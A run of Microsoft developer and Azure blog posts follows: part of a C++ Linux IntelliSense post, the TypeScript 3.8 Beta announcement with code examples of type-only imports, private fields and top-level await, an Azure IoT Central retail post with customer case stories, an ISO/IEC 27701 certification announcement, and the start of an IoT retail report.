  • Remote Copy Include Directories: a list of directories to copy (recursively) from the Linux target. This property affects the remote header copy for IntelliSense but not the build. It can be used when “IntelliSense Uses Compiler Defaults” is set to false. Use Additional Include Directories under the C/C++ General tab to specify additional include directories to be used for both IntelliSense and build.
  • Remote Copy Exclude Directories: a list of directories NOT to copy. Usually this is used to remove subdirectories of the include directories. For example, suppose /usr/include was to be copied. The copy would also contain /usr/include/boost if it were present. However, if the current project does not reference boost then copying it is a waste of time and space. Adding /usr/include/boost to the excluded list avoids the unnecessary copy.
  • IntelliSense Uses Compiler Defaults: a Boolean value indicating whether the compiler referenced by this project (see below) should be queried for its default list of include locations. These are automatically added to the list of remote directories to copy. This property should only be set to false if the compiler does not support gcc-like parameters. Both gcc and clang compiler sets support querying for the include directories (e.g. “g++ -x c++ -E -v -std=c++11”).

Other C++ project properties also affect header copying:

  • C/C++ General tab: Additional Include Directories, C Compiler and C++ Compiler.
  • C/C++ Language tab: C Language Standard and C++ Language Standard

Additional C++ properties for Linux projects that affect header copying under the C/C++ General Tab

The paths found in the Additional Include Directories list are used for both IntelliSense and build. The (non-project) paths in the Additional Include Directories list are automatically added to the list of directories to copy.  The compilers are normally filled out automatically by the selection of Platform Toolset in the General tab. However, in some cases a more precise specification of the compiler is necessary, for example specifying “clang8” when “clang” binds to clang version 6 on the Linux target. The compiler configured here is queried for its default include directory list. The C Language Standard and C++  Language Standard selected are passed as a parameters to the compiler (e.g. -std=c++11) when it is queried. In the past all headers for both c and clang were copied to the local cache. By making use of the compiler and standard selected in the project properties Visual Studio can identify exactly those headers that are necessary for the project and thus avoid copying unnecessary headers.

Properties for the C/C++ Language Standard in Property Pages for C++ Linux Projects

CMake Project Properties

CMake projects have similar settings to control headers copying under the “Advanced Settings” section of the CMake Settings Editor:

CMake Properties to manipulate the remote header copy in the "Advanced" section of the CMake Settings Editor

The paths in the list of remote include directories can be formatted with environment variables and ’~’, for example: ”/usr/include/clang8;$HOME/include;~/myinclude”. For CMake projects the compiler name and language standard are retrieved from the CMake cache. The value of MAKE_C_COMPILER (and CMAKE_CXX_COMPILER) are used to identify the compiler to query. The C_STANDARD (CXX_STANDARD) property are used to identify the standard in effect.

Copying the Headers

The set of directories to be copied is computed each time a project is opened or one of the project properties described above is modified.

In cases where the remote target is updated independently, for example a new version of gcc is installed, then Visual Studio’s cache will be out-of-date with respect to that target. Visual Studio will not detect that the remote headers have changed. In this case the user must request a cache scan by selecting Project > Scan Solution from the main Visual Studio menu, which will cause the directories to be sync’d with the remote target even if they had been previously copied.

Give us your feedback

Do you have feedback on our Linux tooling or CMake support in Visual Studio? We’d love to hear from you to help us prioritize and build the right features for you. We can be reached via the comments below, Developer Community, email (visualcpp@microsoft.com), and Twitter (@VisualC). The best way to suggest new features or file bugs is via Developer Community.

The post Improvements to Accuracy and Performance of Linux IntelliSense appeared first on C++ Team Blog.

Announcing TypeScript 3.8 Beta

$
0
0

Today we’re announcing the availability of TypeScript 3.8 Beta! This Beta release contains all the new features you should expect from TypeScript 3.8’s final release.

To get started using the beta, you can get it through NuGet, or through npm with the following command:

npm install typescript@beta

You can also get editor support by

TypeScript 3.8 brings a lot of new features, including new or upcoming ECMAScript standards features, new syntax for importing/exporting only types, and more.

Type-Only Imports and Export

TypeScript reuses JavaScript’s import syntax in order to let us reference types. For instance, in the following example, we’re able to import doThing which is a JavaScript value along with Options which is purely a TypeScript type.

// ./foo.ts
interface Options {
    // ...
}

export function doThing(options: Options) {
    // ...
}

// ./bar.ts
import { doThing, Options } from "./foo.js";

function doThingBetter(options: Options) {
    // do something twice as good
    doThing(options);
    doThing(options);
}

This is convenient because most of the time we don’t have to worry about what’s being imported – just that we’re importing something.

Unfortunately, this only worked because of a feature called import elision. When TypeScript outputs JavaScript files, it sees that Options is only used as a type, and it automatically drops its import. The resulting output looks kind of like this:

// ./foo.js
export function doThing(options: Options) {
    // ...
}

// ./bar.js
import { doThing } from "./foo.js";

function doThingBetter(options: Options) {
    // do something twice as good
    doThing(options);
    doThing(options);
}

Again, this behavior is usually great, but it causes some other problems.

First of all, there are some places where it’s ambiguous whether a value or a type is being exported. For example, in the following example is MyThing a value or a type?

import { MyThing } from "./some-module.js";

export { MyThing };

Limiting ourselves to just this file, there’s no way to know. Both Babel and TypeScript’s transpileModule API will emit code that doesn’t work correctly if MyThing is only a type, and TypeScript’s isolatedModules flag will warn us that it’ll be a problem. The real problem here is that there’s no way to say “no, no, I really only meant the type – this should be erased”, so import elision isn’t good enough.

The other issue was that TypeScript’s import elision would get rid of import statements that only contained imports used as types. That caused observably different behavior for modules that have side-effects, and so users would have to insert a second import statement purely to ensure side-effects.

// This statement will get erased because of import elision.
import { SomeTypeFoo, SomeOtherTypeBar } from "./module-with-side-effects";

// This statement always sticks around.
import "./module-with-side-effects";

A concrete place where we saw this coming up was in frameworks like Angular.js (1.x) where services needed to be registered globally (which is a side-effect), but where those services were only imported for types.

// ./service.ts
export class Service {
    // ...
}
register("globalServiceId", Service);

// ./consumer.ts
import { Service } from "./service.js";

inject("globalServiceId", function (service: Service) {
    // do stuff with Service
});

As a result, ./service.js will never get run, and things will break at runtime.

To avoid this class of issues, we realized we needed to give users more fine-grained control over how things were getting imported/elided.

As a solution in TypeScript 3.8, we’ve added a new syntax for type-only imports and exports.

import type { SomeThing } from "./some-module.js";

export type { SomeThing };

import type only imports declarations to be used for type annotations and declarations. It always gets fully erased, so there’s no remnant of it at runtime. Similarly, export type only provides an export that can be used for type contexts, and is also erased from TypeScript’s output.

It’s important to note that classes have a value at runtime and a type at design-time, and the use is very context-sensitive. When using import type to import a class, you can’t do things like extend from it.

import type { Component } from "react";

interface ButtonProps {
    // ...
}

class Button extends Component<ButtonProps> {
    //               ~~~~~~~~~
    // error! 'Component' only refers to a type, but is being used as a value here.

    // ...
}

If you’ve used Flow before, the syntax is fairly similar. One difference is that we’ve added a few restrictions to avoid code that might appear ambiguous.

// Is only 'Foo' a type? Or every declaration in the import?
// We just give an error because it's not clear.

import type Foo, { Bar, Baz } from "some-module";
//     ~~~~~~~~~~~~~~~~~~~~~~
// error! A type-only import can specify a default import or named bindings, but not both.

In conjunction with import type, we’ve also added a new compiler flag to control what happens with imports that won’t be utilized at runtime: importsNotUsedAsValues. At this point the name is tentative, but this flag takes 3 different options:

  • remove: this is today’s behavior of dropping these imports. It’s going to continue to be the default, and is a non-breaking change.
  • preserve: this preserves all imports whose values are never used. This can cause imports/side-effects to be preserved.
  • error: this preserves all imports (the same as the preserve option), but will error when a value import is only used as a type. This might be useful if you want to ensure no values are being accidentally imported, but still make side-effect imports explicit.

For more information about the feature, you can take a look at the pull request.

Type-Only vs Erased

There is a final note about this feature. In TypeScript 3.8 Beta, only the type meaning of a declaration will be imported by import type. That means that you can’t use values even if they’re purely used for type positions (like in the extends clause of a class declared with the declare modifier, and the typeof type operator).

import type { Base } from "my-library";

let baseConstructor: typeof Base;
//                          ~~~~
// error! 'Base' only refers to a type, but is being used as a value here.

declare class Derived extends Base {
    //                        ~~~~
    // error! 'Base' only refers to a type, but is being used as a value here.
}

We’re looking at changing this behavior based on recent feedback. Instead of only importing the type side of declarations, we’re planning on changing the meaning of import type to mean “import whatever this is, but only allow it in type positions.” In other words, things imported using import type can only be used in places where it won’t affect surrounding JavaScript code.

While this behavior is not in the beta, you can expect it in our upcoming release candidate, and keep track of that work on its respective pull request.

ECMAScript Private Fields

TypeScript 3.8 brings support for ECMAScript’s private fields, part of the stage-3 class fields proposal. This work was started and driven to completion by our good friends at Bloomberg!

class Person {
    #name: string
    
    constructor(name: string) {
        this.#name = name;
    }

    greet() {
        console.log(`Hello, my name is ${this.#name}!`);
    }
}

let jeremy = new Person("Jeremy Bearimy");

jeremy.#name
//     ~~~~~
// Property '#name' is not accessible outside class 'Person'
// because it has a private identifier.

Unlike regular properties (even ones declared with the private modifier), private fields have a few rules to keep in mind. Some of them are:

  • Private fields start with a # character. Sometimes we call these private names.
  • Every private field name is uniquely scoped to its containing class.
  • TypeScript accessibility modifiers like public or private can’t be used on private fields.
  • Private fields can’t be accessed or even detected outside of the containing class – even by JS users! Sometimes we call this hard privacy.

Apart from “hard” privacy, another benefit of private fields is that uniqueness we just mentioned. For example, regular property declarations are prone to being overwritten in subclasses.

class C {
    foo = 10;

    cHelper() {
        return this.foo;
    }
}

class D extends C {
    foo = 20;

    dHelper() {
        return this.foo;
    }
}

let instance = new D();
// 'this.foo' refers to the same property on each instance.
console.log(instance.cHelper()); // prints '20'
console.log(instance.dHelper()); // prints '20'

With private fields, you’ll never have to worry about this, since each field name is unique to the containing class.

class C {
    #foo = 10;

    cHelper() {
        return this.#foo;
    }
}

class D extends C {
    #foo = 20;

    dHelper() {
        return this.#foo;
    }
}

let instance = new D();
// 'this.#foo' refers to a different field within each class.
console.log(instance.cHelper()); // prints '10'
console.log(instance.dHelper()); // prints '20'

Another thing worth noting is that accessing a private field on any other type will result in a TypeError!

class Square {
    #sideLength: number;
    
    constructor(sideLength: number) {
        this.#sideLength = sideLength;
    }

    equals(other: any) {
        return this.#sideLength === other.#sideLength;
    }
}

const a = new Square(100);
const b = { sideLength: 100 };

// Boom!
// TypeError: attempted to get private field on non-instance
// This fails because 'b' is not an instance of 'Square'.
console.log(a.equals(b));

Finally, for any plain .js file users, private fields always have to be declared before they’re assigned to.

class C {
    // No declaration for '#foo'
    // :(

    constructor(foo: number) {
        // SyntaxError!
        // '#foo' needs to be declared before writing to it.
        this.#foo = foo;
    }
}

JavaScript has always allowed users to access undeclared properties, whereas TypeScript has always required declarations for class properties. With private fields, declarations are always needed regardless of whether we’re working in .js or .ts files.

class C {
    /** @type {number} */
    #foo;

    constructor(foo: number) {
        // This works.
        this.#foo = foo;
    }
}

For more information about the implementation, you can check out the original pull request

Which should I use?

We’ve already received many questions on which type of privates you should use as a TypeScript user: most commonly, “should I use the private keyword, or ECMAScript’s hash/pound (#) private fields?”

Like all good questions, the answer is not good: it depends!

When it comes to properties, TypeScript’s private modifiers are fully erased – that means that while the data will be there, nothing is encoded in your JavaScript output about how the property was declared. At runtime, it acts entirely like a normal property. That means that when using the private keyword, privacy is only enforced at compile-time/design-time, and for JavaScript consumers, it’s entirely intent-based.

class C {
    private foo = 10;
}

// This is an error at compile time,
// but when TypeScript outputs .js files,
// it'll run fine and print '10'.
console.log(new C().foo);    // prints '10'
//                  ~~~
// error! Property 'foo' is private and only accessible within class 'C'.

// TypeScript allows this at compile-time
// as a "work-around" to avoid the error.
console.log(new C()["foo"]); // prints '10'

The upside is that this sort of “soft privacy” can help your consumers temporarily work around not having access to some API, and works in any runtime.

On the other hand, ECMAScript’s # privates are completely inaccessible outside of the class.

class C {
    #foo = 10;
}

console.log(new C().#foo); // SyntaxError
//                  ~~~~
// TypeScript reports an error *and*
// this won't work at runtime!

console.log(new C()["#foo"]); // prints undefined
//          ~~~~~~~~~~~~~~~
// TypeScript reports an error under 'noImplicitAny',
// and this prints 'undefined'.

This hard privacy is really useful for strictly ensuring that nobody can take use of any of your internals. If you’re a library author, removing or renaming a private field should never cause a breaking change.

As we mentioned, another benefit is that subclassing can be easier with ECMAScript’s # privates because they really are private. When using ECMAScript # private fields, no subclass ever has to worry about collisions in field naming. When it comes to TypeScript’s private property declarations, users still have to be careful not to trample over properties declared in superclasses.

Finally, something to consider is where you intend for your code to run. TypeScript currently can’t support this feature unless targeting ECMAScript 2015 (ES6) targets or higher. This is because our downleveled implementation uses WeakMaps to enforce privacy, and WeakMaps can’t be polyfilled in a way that doesn’t cause memory leaks. In contrast, TypeScript’s private-declared properties work with all targets – even ECMAScript 3!

Kudos!

It’s worth reiterating how much work went into this feature from our contributors at Bloomberg. They were diligent in taking the time to learn to contribute features to the compiler/language service, and paid close attention to the ECMAScript specification to test that the feature was implemented in compliant manner. They even improved another 3rd party project, CLA Assistant, which made contributing to TypeScript even easier.

We’d like to extend a special thanks to:

export * as ns Syntax

It’s often common to have a single entry-point that exposes all the members of another module as a single member.

import * as utilities from "./utilities.js";
export { utilities };

This is so common that ECMAScript 2020 recently added a new syntax to support this pattern!

export * as utilities from "./utilities.js";

This is a nice quality-of-life improvement to JavaScript, and TypeScript 3.8 implements this syntax. When your module target is earlier than es2020, TypeScript will output something along the lines of the first code snippet.

Special thanks to community member Wenlu Wang (Kingwl) who implemented this feature! For more information, check out the original pull request.

Top-Level await

Most modern environments that provide I/O in JavaScript (like HTTP requests) is asynchronous, and many modern APIs return Promises. While this has a lot of benefits in making operations non-blocking, it makes certain things like loading files or external content surprisingly tedious.

fetch("...")
    .then(response => response.text())
    .then(greeting => { console.log(greeting) });

To avoid .then chains with Promises, JavaScript users often introduced an async function in order to use await, and then immediately called the function after defining it.

async function main() {
    const response = await fetch("...");
    const greeting = await response.text();
    console.log(greeting);
}

main()
    .catch(e => console.error(e))

To avoid introducing an async function, we can use a handy upcoming ECMAScript feature called “top-level await“.

Previously in JavaScript (along with most other languages with a similar feature), await was only allowed within the body of an async function. However, with top-level await, we can use await at the top level of a module.

const response = await fetch("...");
const greeting = await response.text();
console.log(greeting);

// Make sure we're a module
export {};

Note there’s a subtlety: top-level await only works at the top level of a module, and files are only considered modules when TypeScript finds an import or an export. In some basic cases, you might need to write out export {} as some boilerplate to make sure of this.

Top level await may not work in all environments where you might expect at this point. Currently, you can only use top level await when the target compiler option is es2017 or above, and module is esnext or system. Support within several environments and bundlers may be limited or may require enabling experimental support.

For more information on our implementation, you can check out the original pull request.

es2020 for target and module

Thanks to Kagami Sascha Rosylight (saschanaz), TypeScript 3.8 supports es2020 as an option for module and target. This will preserve newer ECMAScript 2020 features like optional chaining, nullish coalescing, export * as ns, and dynamic import(...) syntax. It also means bigint literals now have a stable target below esnext.

JSDoc Property Modifiers

TypeScript 3.8 supports JavaScript files by turning on the allowJs flag, and also supports type-checking those JavaScript files via the checkJs option or by adding a // @ts-check comment to the top of your .js files.

Because JavaScript files don’t have dedicated syntax for type-checking, TypeScript leverages JSDoc. TypeScript 3.8 understands a few new JSDoc tags for properties.

First are the accessibility modifiers: @public, @private, and @protected. These tags work exactly like public, private, and protected respectively work in TypeScript.

// @ts-check

class Foo {
    constructor() {
        /** @private */
        this.stuff = 100;
    }

    printStuff() {
        console.log(this.stuff);
    }
}

new Foo().stuff;
//        ~~~~~
// error! Property 'stuff' is private and only accessible within class 'Foo'.
  • @public is always implied and can be left off, but means that a property can be reached from anywhere.
  • @private means that a property can only be used within the containing class.
  • @protected means that a property can only be used within the containing class, and all derived subclasses, but not on dissimilar instances of the containing class.

Next, we’ve also added the @readonly modifier to ensure that a property is only ever written to during initialization.

// @ts-check

class Foo {
    constructor() {
        /** @readonly */
        this.stuff = 100;
    }

    writeToStuff() {
        this.stuff = 200;
        //   ~~~~~
        // Cannot assign to 'stuff' because it is a read-only property.
    }
}

new Foo().stuff++;
//        ~~~~~
// Cannot assign to 'stuff' because it is a read-only property.

watchOptions

TypeScript has strived to provide reliable file-watching capabilities in --watch mode and in editors for years. While it’s worked well for the most part, it turns out that file-watching in Node.js is hard, and its drawbacks can be reflected in our logic. The built-in APIs in Node.js are either CPU/energy-intensive and inaccurate (fs.watchFile) or they’re wildly inconsistent across platforms (fs.watch). Additionally, it’s practically impossible to determine which API will work better because it depends not only on the platform, but the file system on which a file resides.

This has been a struggle, because TypeScript needs to run on more platforms than just Node.js, and also strives to avoid dependencies to be entirely self-contained. This especially applies to dependencies on native Node.js modules.

Because every project might work better under different strategies, TypeScript 3.8 introduces a new watchOptions field in tsconfig.json and jsconfig.json which allows users to tell the compiler/language service which watching strategies should be used to keep track of files and directories.

{
    // Some typical compiler options
    "compilerOptions": {
        "target": "es2020",
        "moduleResolution": "node",
        // ...
    },

    // NEW: Options for file/directory watching
    "watchOptions": {
        // Use native file system events for files and directories
        "watchFile": "useFsEvents",
        "watchDirectory": "useFsEvents",

        // Poll files for updates more frequently
        // when they're updated a lot.
        "fallbackPolling": "dynamicPriority"
    }
}

watchOptions contains 4 new options that can be configured:

  • watchFile: the strategy for how individual files are watched. This can be set to
    • fixedPollingInterval: Check every file for changes several times a second at a fixed interval.
    • priorityPollingInterval: Check every file for changes several times a second, but use heuristics to check certain types of files less frequently than others.
    • dynamicPriorityPolling: Use a dynamic queue where less-frequently modified files will be checked less often.
    • useFsEvents (the default): Attempt to use the operating system/file system’s native events for file changes.
    • useFsEventsOnParentDirectory: Attempt to use the operating system/file system’s native events to listen for changes on a file’s containing directories. This can use fewer file watchers, but might be less accurate.
  • watchDirectory: the strategy for how entire directory trees are watched under systems that lack recursive file-watching functionality. This can be set to:
    • fixedPollingInterval: Check every directory for changes several times a second at a fixed interval.
    • dynamicPriorityPolling: Use a dynamic queue where less-frequently modified directories will be checked less often.
    • useFsEvents (the default): Attempt to use the operating system/file system’s native events for directory changes.
  • fallbackPolling: when using file system events, this option specifies the polling strategy that gets used when the system runs out of native file watchers and/or doesn’t support native file watchers. This can be set to
    • fixedPollingInterval: (See above.)
    • priorityPollingInterval: (See above.)
    • dynamicPriorityPolling: (See above.)
  • synchronousWatchDirectory: Disable deferred watching on directories. Deferred watching is useful when lots of file changes might occur at once (e.g. a change in node_modules from running npm install), but you might want to disable it with this flag for some less-common setups.

For more information on watchOptions, head over to GitHub to see the pull request.

“Fast and Loose” Incremental Checking

TypeScript’s --watch mode and --incremental mode can help tighten the feedback loop for projects. Turning on --incremental mode makes TypeScript keep track of which files can affect others, and on top of doing that, --watch mode keeps the compiler process open and reuses as much information in memory as possible.

However, for much larger projects, even the dramatic gains in speed that these options afford us isn’t enough. For example, the Visual Studio Code team had built their own build tool around TypeScript called gulp-tsb which would be less accurate in assessing which files needed to be rechecked/rebuilt in its watch mode, and as a result, could provide drastically low build times.

Sacrificing accuracy for build speed, for better or worse, is a tradeoff many are willing to make in the TypeScript/JavaScript world. Lots of users prioritize tightening their iteration time over addressing the errors up-front. As an example, it’s fairly common to build code regardless of the results of type-checking or linting.

TypeScript 3.8 introduces a new compiler option called assumeChangesOnlyAffectDirectDependencies. When this option is enabled, TypeScript will avoid rechecking/rebuilding all truly possibly-affected files, and only recheck/rebuild files that have changed as well as files that directly import them.

For example, consider a file fileD.ts that imports fileC.ts that imports fileB.ts that imports fileA.ts as follows:

fileA.ts <- fileB.ts <- fileC.ts <- fileD.ts

In --watch mode, a change in fileA.ts would typically mean that TypeScript would need to at least re-check fileB.ts, fileC.ts, and fileD.ts. Under assumeChangesOnlyAffectDirectDependencies, a change in fileA.ts means that only fileA.ts and fileB.ts need to be re-checked.

In a codebase like Visual Studio Code, this reduced rebuild times for changes in certain files from about 14 seconds to about 1 second. While we don’t necessarily recommend this option for all codebases, you might be interested if you have an extremely large codebase and are willing to defer full project errors until later (e.g. a dedicated build via a tsconfig.fullbuild.json or in CI).

For more details, you can see the original pull request.

Breaking Changes

TypeScript 3.8 contains a few minor breaking changes that should be noted.

Stricter Assignability Checks to Unions with Index Signatures

Previously, excess properties were unchecked when assigning to unions where any type had an index signature – even if that excess property could never satisfy that index signature. In TypeScript 3.8, the type-checker is stricter, and only “exempts” properties from excess property checks if that property could plausibly satisfy an index signature.

const obj1: { [x: string]: number } | { a: number };

obj1 = { a: 5, c: 'abc' }
//             ~
// Error!
// The type '{ [x: string]: number }' no longer exempts 'c'
// from excess property checks on '{ a: number }'.

let obj2: { [x: string]: number } | { [x: number]: number };

obj2 = { a: 'abc' };
//       ~
// Error!
// The types '{ [x: string]: number }' and '{ [x: number]: number }' no longer exempts 'a'
// from excess property checks against '{ [x: number]: number }',
// and it *is* sort of an excess property because 'a' isn't a numeric property name.
// This one is more subtle.

object in JSDoc is No Longer any Under noImplicitAny

Historically, TypeScript’s support for checking JavaScript has been lax in certain ways in order to provide an approachable experience.

For example, users often used Object in JSDoc to mean, “some object, I dunno what”, we’ve treated it as any.

// @ts-check

/**
 * @param thing {Object} some object, i dunno what
 */
function doSomething(thing) {
    let x = thing.x;
    let y = thing.y;
    thing();
}

This is because treating it as TypeScript’s Object type would end up in code reporting uninteresting errors, since the Object type is an extremely vague type with few capabilities other than methods like toString and valueOf.

However, TypeScript does have a more useful type named object (notice that lowercase o). The object type is more restrictive than Object, in that it rejects all primitive types like string, boolean, and number. Unfortunately, both Object and object were treated as any in JSDoc.

Because object can come in handy and is used significantly less than Object in JSDoc, we’ve removed the special-case behavior in JavaScript files when using noImplicitAny so that in JSDoc, the object type really refers to the non-primitive object type.

What’s Next?

Now that the beta is out, our team has been focusing largely on bug fixes and polish for what will eventually become TypeScript 3.8. As you can see on our current Iteration Plan, we’ll have one release candidate (a pre-release) in a couple of weeks, followed by a full release around mid-February. As editor features we’ve developed become more mature, we’ll also show off functionality like Call Hierarchy and the “convert to template string” refactoring.

If you’re able to give our beta a try, we would highly appreciate your feedback! So download it today, and happy hacking!

– Daniel Rosenwasser and the TypeScript Team

The post Announcing TypeScript 3.8 Beta appeared first on TypeScript.

Retailers embrace Azure IoT Central

$
0
0

For many retailers around the world, the busiest quarter of the year just finished with holiday shopping through Black Friday and Cyber Monday to Boxing Day. From supply chain optimization, to digital distribution, and in-store analytics, the retail industry has wholeheartedly embraced IoT technology to support those spikes in demand; particularly in scenarios where brands need to build flexibility, hire strong talent, and optimize the customer experience in order to build brand loyalty. In our latest IoT Signals for Retail research, commissioned by Microsoft and released January 2020, we explore the top insights from leaders who are using IoT today. We discuss growth areas such as improving the customer experience, the use of artificial intelligence to achieve break-through success, and nuances between global markets around security concerns and compliance.

Building retail IoT solutions with Azure IoT Central

As Microsoft and its global partners continue to turn retail insights into solutions that empower retailers around the world, a key question continues to face decision makers about IoT investments; whether to build a solution from scratch, or buy a solution that fits their needs. For many solution builders, Azure IoT Central is the perfect fit, a fully managed IoT platform with predictable pricing and unique features like retail specific application templates that can accelerate solution development thanks to the inclusion of over 30 underlying Azure services. Let us manage the services so you can focus on what’s more important, applying your deep industry knowledge to help your customers.

New tools to accelerate building a retail IoT Solution

Today we are excited to announce the addition of our sixth IoT Central retail application template for solution builders. The Micro-fulfilment center template showcases how connectivity and automation can reduce cost by eliminating downtime, increasing security, and improving efficiency. App templates can help solution builders get started quickly and includes sample operator dashboards, sample device templates, simulated devices producing real-time data, access to Plug and Play devices, and security features that give you peace of mind. Fulfillment optimization is a cornerstone of operations for many retailers and optimizing early may offer significant returns in the future. Application templates are helping solution builders overcome challenges like getting past the proof-of-concept phase, or building rapid business cases for new IoT scenarios.

IoT Central Retail Application Templates for solution builders.

: 6 IoT Central retail application templates designed to accelerate solution development.

Innovative Retailers share their IoT stories

In addition to rich industry insights like those found in IoT Signals for Retail, we are proudly releasing three case stories detailing decisions, trade-offs, processes, and results from top global brands investing in IoT solutions, and the retail solution builders supporting them. Read more about how these companies are implementing and winning with their IoT investments and uncover details that might offer you an edge as you navigate your own investments and opportunities.

South Africa Breweries and CIRT team up to solve a cooler tracking conundrum

South Africa Breweries, a subsidiary of AB InBev, is the worlds’ largest brewing company and is committed to keeping its product fresh and cold for customers, a challenge that most consumers take for granted. From tracking missing coolers to reducing costs, and achieving sustainability goals, Sameer Jooma, Director of Innovation and Analytics for AB InBev turned to IoT innovation led by Consumption Information Real Time (CIRT), a South African solution builder. CIRT was tasked to pilot Fridgeloc Connected Cooler, a cooler monitoring system, providing real time insight into temperature (both internal cooler and condenser), connected state and location of hundreds of coolers through urban and rural South Africa. Revamping an existing cooler audit process that involved auditors visiting dealer locations to verify that a cooler was in the right place, and tracking the time between delivery and installation to an outlet are just two of the process optimization benefits found by Jooma.

“The management team wanted to have a view of the coolers, and to be able to manage them centerally at a national level. IoT Central enabled us to gain that live view.” - Sameer Jooma, Director: Innovation and Analytics, AB InBev.

Learn more about the universal cooler challenges that face merchants and consumer packaged goods companies worldwide in the case story.

On the “road” to a connected cooler in rural South Africa, a field technician gets stuck in the sand on his way to the tavern

On the “road” to a connected cooler in rural South Africa, a field technician gets stuck in the sand on his way to the tavern.

Fridgeloc Connected Cooler at a tavern in Soweto, South Africa

Fridgeloc Connected Cooler at a tavern in Soweto, South Africa.

Mars Incorporated Halloween display campaign unveils new insights thanks to Footmarks Inc.

For most consumer packaged goods companies, sales spike during holiday times thanks to investments across the marketing and sales mix, from online display advertising to in-store physical displays. This past Halloween, Jason Wood, Global Display Development Head, Mars Inc., a global manufacturer of confectionery and other food products, decided it was time to gain deeper insights into an age-old problem of tracking where their product displays went after they left the warehouse. Previously, Mars was only able to track the number of displays it produced, and how many left its warehouses for retailer destinations. They found the right partner with Footmarks Inc. who has designed their beacon and gateway-based display tracking solution with Azure IoT Central to deliver secure, simple and scalable insights into what happens once displays begin transit. Several interesting insights emerged throughout the campaign and afterward.

"Information on when displays came off the floor were surprising—major insights that we wouldn't have been able to get to without the solution." - Jason Wood, Global Display Development Head, Mars Inc.

Learn more about challenges Mars and Footmarks faced scaling, pricing, and managing devices for display tracking in the case story.

: Foormarks Inc., Smart Connect Cloud dashboard for Mars Wrigley showing display tracking solution using IoT sensors for the 2019 Halloween campaign.

Foormarks Inc., Smart Connect Cloud dashboard for Mars Wrigley showing display tracking solution using IoT sensors for the 2019 Halloween campaign.

Microsoft turns to C.H. Robinson and Intel for Xbox and Surface supply chain visibility

In advance of the busy 2019 holiday season and the introduction of many new Surface SKU’s, the Microsoft supply chain team was interested in testing the benefits of a single platform connecting IoT devices on shipments globally, streamlining analytics and device management. This Microsoft team was also thinking ahead, preparing for the launch of the latest Xbox console, Xbox Series X, and for a series of new Surface product launches. With Surface and Xbox demand projected to grow around the world, the need for insights and appropriate actions along the supply chain was only going to increase. The Microsoft team partnered with TMC (a division of C.H. Robinson), a global technology and logistics management provider who partnered with Intel, to design a transformative solution based on their existing Navisphere Vision software that could be deployed globally using Azure IoT Central. The goal was to track and monitor shipments’ ambient condition for shock, light, and temperature to identify any damage in real time, anywhere in the world—at a scale covering millions of products.

“The real power comes in the combination of C.H. Robinson’s Navisphere Vision, technology that is built by and for supply chain experts, and the speed, security, and connectivity of Azure IOT Central.” - Chris Cutshaw, Director of Commercial and Product Strategy at TMC

Learn more about the results from the recent holiday season and what Navisphere Vision can do for global supply chain visibility in the case story.

CH Robinson image 5

Navisphere Vision dashboard showing IoT Sensors activity, managed through Azure IoT Central.

Getting started

NRF 2020: Retail's Big Show is happening in Manhattan from January 12 to 14. Azure IoT and other experts including retail solution builders Attabotics, C.H. Robinson, and CIRT will be in attendance.

Read more about IoT Signals for Retail report.

Get started with Azure IoT Central today.

Learn more about the solutions being used by these customers today.


Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries.

    Azure is now certified for the ISO/IEC 27701 privacy standard

    $
    0
    0

    We are pleased to share that Azure is the first major US cloud provider to achieve certification as a data processor for the new international standard ISO/IEC 27701 Privacy Information Management System (PIMS). The PIMS certification demonstrates that Azure provides a comprehensive set of management and operational controls that can help your organization demonstrate compliance with privacy laws and regulations. Microsoft’s successful audit can also help enable Azure customers to build upon our certification and seek their own certification to more easily comply with an ever-increasing number of global privacy requirements.

    Being the first major US cloud provider to achieve a PIMS certification is the latest in a series of privacy firsts for Azure, including being the first to achieve compliance with EU Model clauses. Microsoft was also the first major cloud provider to voluntarily extend the core data privacy rights included in the GDPR (General Data Protection Regulation) to customers around the world.

    PIMS is built as an extension of the widely-used ISO/IEC 27001 standard for information security management, making the implementation of PIMS’s privacy information management system a helpful compliance extension for the many organizations that rely on ISO/IEC 27001, as well as creating a strong integration point for aligning security and privacy controls. PIMS accomplishes this through a framework for managing personal data that can be used by both data controllers and data processors, a key distinction for GDPR compliance. In addition, any PIMS audit requires the organization to declare applicable laws/regulations in its criteria for the audit meaning that the standard can be mapped to many of the requirements under GDPR, CCPA (California Consumer Privacy Act), or other laws. This universal framework allows organizations to efficiently operationalize compliance with new regulatory requirements.

    PIMS also helps customers by providing a template for implementing compliance with new privacy regulations, helping reduce the need for multiple certifications and audits against new requirements and thereby saving both time and money. This will be critical for supply chain business relationships as well as cross-border data movement. 

    This short video demonstrates how Microsoft complies with ISO/IEC 27701 and our compliance benefits customers. 

    Schellman & Company LLC issued a certificate of registration for ISO/IEC 27701:2019 that covers the requirements, controls, and guidelines for implementing a privacy information security management system as an extension to ISO/IEC 27001:2013 for privacy management as a personally identifiable information (PII) processor relevant to the information security management system supporting Microsoft Azure, Dynamics, and other online services that are deployed in Azure Public, Government cloud, and Germany Cloud, including their development, operations, and infrastructures and their associated security, privacy, and compliance per the statement of applicability version 2019-02. A copy of the certification is available on the Service Trust Portal.

    Modern business is driven by digital transformation, including the ability to deeply understand data and unlock the power of big data analytics and AI. But before customers – and regulators – will allow you to leverage this data, you must first win their trust. Microsoft simplifies this privacy burden with tools that can help you automate privacy, including built-in controls like PIMS. 

    Microsoft has longstanding commitments to privacy, and we continue to take steps to give customers more control over their data. Our Trusted Cloud is built on our commitments to privacy, security, transparency, and compliance, and our Trust Center provides access to validated audit reports, data management capabilities, and information about the number of legal demands we received for customer data from law enforcement.

    IoT Signals retail report: IoT’s promise for retail will be unlocked addressing security, privacy and compliance

    $
    0
    0

    Few industries have been disrupted by emerging technology quite like retail. From exploding online sales to the growth of mobile shopping, the industry has made a permanent shift to accommodate digital consumers.

    The rise of IoT has forced the retail industry to take notice; IDC expects that by 2025 there will be 41.6 billion connected IoT devices or ‘things,’ generating more than 79 zettabytes (ZB) of data. These billions of devices are creating unprecedented visibility into a business, leading to transformation of operations, from the supply chain to automated checkout, personalized discounts, smart shelves, and other advances powered by IoT. In fact, IoT can help brick-and-mortar stores create customer experiences that rival that of online stores; for instance, customers can be sent alerts about discounts relevant to them when they get close to a store, and those stores can use IoT to keep track of inventory and increase efficiency.

